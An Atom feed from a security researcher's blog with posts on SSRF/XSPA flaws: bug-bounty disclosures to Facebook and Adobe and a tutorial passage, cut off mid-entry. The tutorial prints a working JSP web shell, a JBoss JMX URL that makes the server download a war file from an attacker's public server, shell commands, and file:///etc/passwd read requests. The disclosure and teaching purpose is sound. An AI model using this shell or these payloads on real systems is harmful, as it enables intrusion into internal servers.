<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;C0YARHYzeip7ImA9WhBbFEo.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225</id><updated>2013-05-13T11:52:25.882-07:00</updated><category term="syntax error" /><category term="web application" /><category term="Antwerp" /><category term="xvid" /><category term="First post" /><category term="desktops" /><category term="Cool" /><category term="vulnerability" /><category term="Removable" /><category term="office life" /><category term="malware" /><category term="tcpview" /><category term="CTF" /><category term="Backup APIs" /><category term="Awesome" /><category term="Spambot" /><category term="torrents" /><category term="adobe" /><category term="Windows" /><category term="bid" /><category term="misery" /><category term="process monitor" /><category term="RootKitRevealer" /><category term="cisco" /><category term="cocon" /><category term="angel" /><category term="openfire" /><category term="rdp" /><category term="pg room" /><category term="bug bounty" /><category term="amvo.exe" /><category term="FolderCloak" /><category term="cookie monster" /><category term="full disclosure" /><category term="Humor" /><category term="xss" /><category term="evil" /><category term="persistent" /><category term="injection" /><category term="Pain" /><category term="process explorer" /><category term="kids" /><category term="story" /><category term="facebook" /><category term="username enumeration" /><category 
term="SeLoadDriverPrivelege" /><category term="blackhat2012" /><category term="aircrack" /><category term="os" /><category term="walkthrough" /><category term="hsr" /><category term="inflation" /><category term="IPL" /><category term="hacker conference" /><category term="dream" /><category term="autorun" /><category term="themes" /><category term="xmlhttp" /><category term="wordpress" /><category term="USB" /><category term="autogk" /><category term="SmartPhone" /><category term="movie" /><category term="rain" /><category term="ranvir" /><category term="apache archiva" /><category term="whitehat" /><category term="stored XSS" /><category term="System Folders" /><category term="rainmeter" /><category term="cross site scripting" /><category term="Recycle Bin" /><category term="love" /><category term="Secret" /><category term="Do Re Mi" /><category term="csrf" /><category term="Windows Mobile" /><category term="irony" /><category term="admin" /><category term="joomla" /><category term="2011" /><category term="deviantart" /><category term="iframe" /><category term="Cricket" /><category term="hacking" /><category term="delnaz" /><category term="prices" /><category term="Sysinternals" /><category term="c0c0n" /><category term="tumblr" /><category term="data hiding" /><category term="dvdrip" /><category term="compression" /><category term="Auction" /><category term="enigma" /><category term="memories" /><category term="zeus" /><category term="dvd decrypter" /><category term="php.ini" /><category term="shell" /><category term="airodump" /><category term="owasp" /><category term="axxo" /><category term="fppg1" /><category term="Acer M900" /><category term="Dream Phone" /><category term="vbscript" /><category term="wlan" /><category term="command execution" /><category term="ssrf" /><category term="omniture" /><category term="XSPA" /><category term="bots" /><category term="sarcasm" /><category term="NTStream" /><category term="esapi" /><category term="Happy" /><category 
term="20Twenty" /><category term="Cross Site Port Attacks" /><category term="birthday" /><category term="backdoor" /><category term="Belgium" /><category term="php" /><category term="ajax" /><category term="hall of fame" /><category term="Werror" /><category term="poc" /><category term="tutorial" /><category term="raees" /><category term="remote" /><category term="Kneber" /><category term="symantec" /><category term="NTFS ADS" /><category term="life" /><category term="HITB" /><category term="wipe addressbook" /><category term="Maria" /><category term="wireless" /><category term="10 foot HUD" /><category term="LFI" /><category term="cve" /><category term="twitter" /><category term="CFLAGS" /><category term="short_open_tag" /><category term="virus" /><category term="Station" /><category term="Case Study" /><category term="Ubuntu" /><category term="fiction" /><category term="appsecusa" /><category term="security conference" /><category term="700mb" /><category term="Mark Russinovich" /><title>A Bug Hunter's Rhapsody</title><subtitle type="html">UDFj-39546284, computers and everything in between..</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.riyazwalikar.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><generator version="7.00" 
uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>35</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/riyazwalikar" /><feedburner:info uri="riyazwalikar" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;Ck8ARnkzcSp7ImA9WhBbEk8.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-4609494372895899577</id><published>2013-05-10T14:20:00.001-07:00</published><updated>2013-05-10T14:20:47.789-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-10T14:20:47.789-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="whitehat" /><category scheme="http://www.blogger.com/atom/ns#" term="Cross Site Port Attacks" /><category scheme="http://www.blogger.com/atom/ns#" term="bug bounty" /><category scheme="http://www.blogger.com/atom/ns#" term="facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="XSPA" /><category scheme="http://www.blogger.com/atom/ns#" term="ssrf" /><title>XSPA / SSRF bug with Facebook's Developer Web Application</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
This post is about a responsible disclosure I made to Facebook recently about a vulnerability with their developer.facebook.com web application that allowed an attacker to perform port scans on remote machines on the Internet. An attacker could scan Internet facing machines for open ports and proxy his scans through Facebook's IP addresses using this vulnerability.&lt;br /&gt;&lt;br /&gt;
The URL http://developers.facebook.com/tools/debug/og/object is vulnerable to an SSRF / XSPA vulnerability (CWE-918) via the 'q' parameter, allowing an attacker to port scan external Internet facing systems and, based on error messages and response data, identify IP addresses on the internal network as well.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
The following steps can be used to reproduce the issue. All scans have been verified against scanme.nmap.org, which is known to have ports 22, 80 and 9929 open. 
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;p&gt;
Step 1: Navigate to http://developers.facebook.com/tools/debug and enter the following URL in the 'q' text box (open port test):
http://scanme.nmap.org:22/index.html&lt;br /&gt;
A GET request is sent to http://developers.facebook.com/tools/debug/og/object with the 'q' parameter being passed via the URL.&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Step 2: Notice the "Response Code" received by Facebook from the remote server (502).&lt;br /&gt;&lt;br /&gt;

&lt;a href="http://4.bp.blogspot.com/-U8egp7zHD2E/UY1bXXa3SLI/AAAAAAAAAp0/5GxvMiDlW68/s1600/open_port.png" imageanchor="1" &gt;&lt;img border="0" height=171 width=570 src="http://4.bp.blogspot.com/-U8egp7zHD2E/UY1bXXa3SLI/AAAAAAAAAp0/5GxvMiDlW68/s1600/open_port.png" /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;
Step 3: Repeat the request for http://scanme.nmap.org:25/index.html (closed port test)&lt;/p&gt;
&lt;p&gt;
Step 4: Notice the Response Code received by Facebook from the remote server (503).&lt;br /&gt;&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/-dN0-OrXuTZE/UY1bXD4QG1I/AAAAAAAAApw/A71GmIJaGgI/s1600/closed_port.png" imageanchor="1" &gt;&lt;img border="0" height=172 width=570 src="http://1.bp.blogspot.com/-dN0-OrXuTZE/UY1bXD4QG1I/AAAAAAAAApw/A71GmIJaGgI/s1600/closed_port.png" /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;
Other responses that have been noticed for open ports include 200, 404 and 206. The error response "Error parsing input URL, no data was scraped." is also seen if a request is sent to a non-ASCII port (3389 etc.).&lt;br /&gt;&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/-t1OKf7ufOZs/UY1bXHM2LTI/AAAAAAAAAp4/2lWYhabQYYQ/s1600/open_nonascii_port.png" imageanchor="1" &gt;&lt;img border="0" height=141 width=570 src="http://1.bp.blogspot.com/-t1OKf7ufOZs/UY1bXHM2LTI/AAAAAAAAAp4/2lWYhabQYYQ/s1600/open_nonascii_port.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;br /&gt;

&lt;p&gt;
I wrote a simple port scanner in Python that utilises this bug to make connections to remote systems, which you can download &lt;a href="https://github.com/riyazwalikar/xspafbportscanner/blob/master/xspafbportscanner.py"&gt;from GitHub&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;
&lt;a href="http://3.bp.blogspot.com/--24byv9A1kg/UY1bapQ9L4I/AAAAAAAAAqI/C86N1F2zmJk/s1600/portscan_comparisons.png" imageanchor="1" &gt;&lt;img border="0" height=424 width=570 src="http://3.bp.blogspot.com/--24byv9A1kg/UY1bapQ9L4I/AAAAAAAAAqI/C86N1F2zmJk/s1600/portscan_comparisons.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;br /&gt;
Facebook paid out a bounty for this bug although they did not fix the issue completely. This is what they had to say: 
&lt;br /&gt; &lt;br /&gt;
&lt;blockquote&gt;
"There are quite a few ways that our service can be made to issue requests to third-parties, and it's unfortunately not feasible to block non-standard ports on all of them. This debugging tool is one of those endpoints where it's incredibly helpful to allow requests to non-standard ports. We monitor and rate-limit the usage of this endpoint but the implications here are low-risk enough that we've decided not to eliminate this helpful functionality entirely."
&lt;/blockquote&gt;
&lt;br /&gt;
And I agree: rate-limiting the number of requests received from a single IP/subnet/network that look suspicious is one way this could be kept under check; however, this bug will remain a good example of functionality that can be heavily abused.
&lt;br /&gt;
&lt;br /&gt;
Happy hunting!!
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/Xzvuhpu_8uk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/4609494372895899577/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2013/05/xspa-ssrf-bug-with-facebooks-developer.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/4609494372895899577?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/4609494372895899577?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/Xzvuhpu_8uk/xspa-ssrf-bug-with-facebooks-developer.html" title="XSPA / SSRF bug with Facebook's Developer Web Application" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-U8egp7zHD2E/UY1bXXa3SLI/AAAAAAAAAp0/5GxvMiDlW68/s72-c/open_port.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2013/05/xspa-ssrf-bug-with-facebooks-developer.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkUFQXc_cSp7ImA9WhBVF0s.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-6766812655285811530</id><published>2013-04-23T15:35:00.000-07:00</published><updated>2013-04-23T16:36:50.949-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-23T16:36:50.949-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="omniture" 
/><category scheme="http://www.blogger.com/atom/ns#" term="XSPA" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="adobe" /><category scheme="http://www.blogger.com/atom/ns#" term="blackhat2012" /><category scheme="http://www.blogger.com/atom/ns#" term="ssrf" /><category scheme="http://www.blogger.com/atom/ns#" term="hall of fame" /><title>XSPA / SSRF Vulnerability with the Adobe Omniture Web Application</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
This is a video demonstrating the XSPA / SSRF vulnerability that I discovered in Adobe's Omniture Web Application back in November 2012 while writing a paper for BlackHat2012 AD. This was a typical XSPA / SSRF bug that allowed, amongst other things, port scanning of Internet facing servers using Adobe's machines, reading local files using the file:// protocol and detecting internal machines and the services running on them. 
&lt;br /&gt;
&lt;br /&gt;
Adobe has now fixed this issue and put me on &lt;a href="http://www.adobe.com/support/security/bulletins/securityacknowledgments.html" target="_blank"&gt;Adobe's Acknowledgement page for Security Researchers&lt;/a&gt;.
&lt;br /&gt;
&lt;br /&gt;
More on SSRF / XSPA:
http://cwe.mitre.org/data/definitions/918.html
http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html
&lt;br /&gt;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;
&lt;div dir="ltr" style="text-align: center;" trbidi="on"&gt;
&lt;iframe width="560" height="315" src="http://www.youtube.com/embed/OLLFgJ5OQj0?vq=hd720" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;br/&gt;&lt;br/&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Comments and feedback are welcome!
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/ATy-5r6tvYs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/6766812655285811530/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2013/04/xspa-ssrf-vulnerability-with-adobe.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/6766812655285811530?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/6766812655285811530?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/ATy-5r6tvYs/xspa-ssrf-vulnerability-with-adobe.html" title="XSPA / SSRF Vulnerability with the Adobe Omniture Web Application" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/OLLFgJ5OQj0/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2013/04/xspa-ssrf-vulnerability-with-adobe.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEQBSH46eCp7ImA9WhNXFEs.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-2194958919031376680</id><published>2012-12-02T07:32:00.001-08:00</published><updated>2012-12-02T07:32:39.010-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-02T07:32:39.010-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cross Site Port Attacks" /><category 
scheme="http://www.blogger.com/atom/ns#" term="appsecusa" /><category scheme="http://www.blogger.com/atom/ns#" term="XSPA" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="ssrf" /><title>AppSecUSA 2012 - Cross Site Port Attacks Talk Video</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
My talk on Cross Site Port Attacks (XSPA) at the recently concluded AppSecUSA 2012, Austin, TX is now online. Here's an embed:
&lt;br /&gt;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;
&lt;div dir="ltr" style="text-align: center;" trbidi="on"&gt;
&lt;iframe allowfullscreen="allowfullscreen" frameborder="0" height="275" mozallowfullscreen="mozallowfullscreen" src="http://player.vimeo.com/video/54107684?badge=0" webkitallowfullscreen="webkitallowfullscreen" width="500"&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;br/&gt;&lt;br/&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Comments and feedback are welcome!
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/-JpvjNv16jg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/2194958919031376680/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/12/appsecusa-2012-cross-site-port-attacks.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2194958919031376680?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2194958919031376680?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/-JpvjNv16jg/appsecusa-2012-cross-site-port-attacks.html" title="AppSecUSA 2012 - Cross Site Port Attacks Talk Video" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>3</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/12/appsecusa-2012-cross-site-port-attacks.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0cBQ3c6eSp7ImA9WhNRGU8.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-7293374345555452872</id><published>2012-11-14T12:48:00.000-08:00</published><updated>2012-11-14T13:37:32.911-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-11-14T13:37:32.911-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cross Site Port Attacks" /><category scheme="http://www.blogger.com/atom/ns#" term="appsecusa" /><category scheme="http://www.blogger.com/atom/ns#" term="XSPA" /><category scheme="http://www.blogger.com/atom/ns#" 
term="owasp" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="ssrf" /><title>Cross Site Port Attacks - XSPA - Part 3</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;In the last two posts we saw what Cross Site Port Attacks (XSPA) are and the different attacks that are possible via XSPA. This post continues the previous posts and is the last in the series of three. In this post we will see other interesting attacks and also see how developers can prevent XSPA or limit the attack surface itself.
&lt;br /&gt;&lt;br /&gt;
Read &lt;a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html"&gt;Cross Site Port Attacks - XSPA - Part 1&lt;/a&gt;&lt;br /&gt;
Read &lt;a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-2.html"&gt;Cross Site Port Attacks - XSPA - Part 2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;Attacks - Attacking Internal Vulnerable Web Applications&lt;/span&gt; &lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
More often than not, intranet applications lack even the most basic security, allowing an attacker on the internal network to attack and access server resources including data and code. Being an intranet application, reaching it from the Internet requires VPN access to the internal network or specialized connectivity along the same lines. Using XSPA, however, an attacker can target vulnerable internal web applications via the Internet exposed web application.
&lt;br/&gt;&lt;br/&gt;
A very common example I can think of, and which I have seen during numerous pentests, is the presence of a JBoss Server vulnerable to a bunch of issues. My favorite of them is the absence of authentication, by default, on the JMX console, which runs on port 8080 by default.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/--Re66ME7p30/UKP2MDwuEuI/AAAAAAAAAmk/kSTChWIpgW0/s1600/jmx_console.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="410" width="520" src="http://4.bp.blogspot.com/--Re66ME7p30/UKP2MDwuEuI/AAAAAAAAAmk/kSTChWIpgW0/s1600/jmx_console.png" /&gt;&lt;/a&gt;&lt;/div&gt;


&lt;br/&gt;
A well &lt;a href="https://www.google.co.in/search?q=hacking%20jboss%20jmx-console"&gt;documented hack&lt;/a&gt; using the JMX console allows an attacker to deploy a war file containing JSP code that would allow command execution on the server. If an attacker has direct access to the JMX console, deploying a war file containing the following JSP code is relatively straightforward:&lt;br /&gt;&lt;br/&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
&amp;lt;%@ page import="java.util.*,java.io.*"%&amp;gt;&lt;br/&gt;
&amp;lt;pre&amp;gt;&lt;br/&gt; 
&amp;lt;% Process p = Runtime.getRuntime().exec("cmd /c " + request.getParameter("x")); &lt;br/&gt;
DataInputStream dis = new DataInputStream(p.getInputStream());&lt;br/&gt; 
String disr = dis.readLine();&lt;br/&gt;
while (  disr != null ) {&lt;br/&gt; 
out.println(disr);&lt;br/&gt;
disr = dis.readLine();&lt;br/&gt;
} %&amp;gt; &lt;br/&gt;
&amp;lt;/pre&amp;gt; &lt;br/&gt;
&lt;/span&gt;
&lt;/div&gt;
&lt;br/&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Using the MainDeployer under jboss.system:service in the JMX Bean View, we can deploy a war file containing a JSP shell. The MainDeployer can be found at the following address:
&lt;br /&gt;&lt;br/&gt;&lt;/span&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
http://example_server:8080/jmx-console/HtmlAdaptor?action=inspectMBean&amp;name=jboss.system%3Aservice%3DMainDeployer
&lt;/span&gt;
&lt;/div&gt;

&lt;br/&gt;

&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
Using the MainDeployer, for example, a war file named cmd.war containing a shell named shell.jsp can be deployed to the server and accessed via http://example_server:8080/cmd/shell.jsp. Commands can then be executed via shell.jsp?x=[command]. To perform this via XSPA we obviously need to replace example_server with the IP/hostname of the server running JBoss on the internal network.&lt;/span&gt; 
&lt;br /&gt;&lt;br/&gt;

&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
A small problem here that becomes a roadblock in performing this attack via XSPA is that the file deploy works via a POST request, and hence we cannot craft a URL (at least we think so) that would deploy the war file to the server. This can easily be solved by converting the POST to a GET request for the JMX console. On a test installation, we can identify the variables that are sent to the JBoss server when the MainDeployer's deploy() function is called. Using your favorite proxy, or simply the Firefox addon Web Developer's "Convert POST to GET" functionality, we can construct a URL that would allow deploying the cmd.war file to the server. We then only need to host the cmd.war file on an Internet facing server so that we can specify the cmd.war file URL as arg0. The final URL would look something like the following (assuming the JBoss server is running on the same host as the web server):&lt;br/&gt;&lt;br/&gt;
&lt;/span&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
http://127.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp&amp;name=jboss.system:service=MainDeployer&amp;methodIndex=17&amp;arg0=http://our_public_internet_server/utils/cmd.war
&lt;/span&gt;
&lt;/div&gt;
&lt;br/&gt;

&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
Use this URL as input to the XSPA vulnerable web application and, if the application displays the responses received from the backend, you should see something along the lines of the following:
&lt;/span&gt;
&lt;br/&gt;&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Z18fpjlkHCk/UKP7L3wMeGI/AAAAAAAAAm4/Cj875aGL5Uk/s1600/jmx_op_completed.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="243" width="520" src="http://1.bp.blogspot.com/-Z18fpjlkHCk/UKP7L3wMeGI/AAAAAAAAAm4/Cj875aGL5Uk/s1600/jmx_op_completed.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br/&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
Then it's a matter of requesting shell.jsp via the XSPA vulnerable web application. For example, the following input would return the directory listing on the JBoss server (assuming it's Windows; for Linux, x=ls%20-al can be used):
&lt;/span&gt;
&lt;br/&gt;&lt;br/&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
http://127.0.0.1:8080/cmd/shell.jsp?x=dir
&lt;/span&gt;
&lt;/div&gt;
&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vxr29didu6A/UKP95LepdvI/AAAAAAAAAnM/eQhdTtMJLM8/s1600/jboss_shell_dir_output.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="470" width="520" src="http://3.bp.blogspot.com/-vxr29didu6A/UKP95LepdvI/AAAAAAAAAnM/eQhdTtMJLM8/s1600/jboss_shell_dir_output.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;&lt;br/&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
http://127.0.0.1:8080/cmd/shell.jsp?x=tasklist
&lt;/span&gt;
&lt;/div&gt;
&lt;br/&gt;


&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-yLeAwAQ-XrE/UKP-JOyfF9I/AAAAAAAAAnY/wYKClkpSoeA/s1600/jboss_shell_tasklist_output.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="490" width="520" src="http://1.bp.blogspot.com/-yLeAwAQ-XrE/UKP-JOyfF9I/AAAAAAAAAnY/wYKClkpSoeA/s1600/jboss_shell_tasklist_output.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;&lt;br/&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
We have successfully attacked an internal vulnerable web application from the Internet using XSPA. We can then use the shell to download a reverse connect program that would give greater flexibility in issuing commands. Similarly, other internal applications vulnerable to threats like SQL Injection, parameter manipulation and other URL based attacks can be targeted from the Internet.
&lt;/span&gt;
&lt;br/&gt;&lt;br/&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;Attacks - Reading local files using file:/// protocol&lt;/span&gt; &lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
All the attacks that we have seen so far make use of the fact that the XSPA vulnerable web application creates an HTTP request to the requested resource; the protocol in all cases was specified by the attacker. If, on the other hand, we specify the file protocol handler, we may be able to read local files on the server. An input of the following form would cause the application to read files on disk:
&lt;br/&gt;&lt;br/&gt;
Request: file:///C:/Windows/win.ini
&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-3lFGc8lwxYc/UKP_SoHJ5EI/AAAAAAAAAnk/Wr-aMmJAVRE/s1600/file_read.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="530" width="520" src="http://1.bp.blogspot.com/-3lFGc8lwxYc/UKP_SoHJ5EI/AAAAAAAAAnk/Wr-aMmJAVRE/s1600/file_read.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;&lt;br/&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
The following screengrab shows the reading of the /etc/passwd file on an Adobe owned server via Adobe's Omniture web application. The request was file:///etc/passwd. Adobe has now fixed this issue and credited me on the &lt;a href="http://www.adobe.com/support/security/bulletins/securityacknowledgments.html" target="_blank"&gt;Adobe Hall of Fame&lt;/a&gt; for the same:
&lt;/span&gt;
&lt;br/&gt;&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
